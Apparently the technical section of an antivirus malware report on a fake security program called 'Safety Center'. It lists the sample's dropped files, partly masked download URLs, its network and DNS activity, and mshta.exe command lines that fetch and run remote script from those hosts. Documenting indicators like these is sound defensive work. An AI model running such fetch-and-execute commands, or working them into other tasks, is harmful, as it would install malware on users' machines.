Technical information
- "%TEMP%\protect.exe" (downloaded from the Internet)
- <SYSTEM32>\mshta.exe http://ur###nam.net/ass.php
- <SYSTEM32>\mshta.exe http://cr#####-affiliates.com/install.php?id#################################
- <SYSTEM32>\cmd.exe /c """%TEMP%\t.bat"" "
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\ass[1].php
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\0D6B6PI5\install[1].php
- %TEMP%\protect.exe
- %TEMP%\par.exe
- %TEMP%\t.bat
- 'ur###nam.net':80
- 'cr#####-affiliates.com':80
- 'localhost':1034
- '22#.#96.59.23':80
- 'localhost':1035
- cr#####-affiliates.com/install.php?id#################################
- ur###nam.net/ass.php
- 22#.#96.59.23/u4.exe
- DNS ASK cr#####-affiliates.com
- DNS ASK ur###nam.net
- '<IP address on the local network>':1037
- '<IP address on the local network>':1036
- ClassName: 'TForm1' WindowName: 'Safety Center'
- ClassName: 'Shell_TrayWnd' WindowName: ''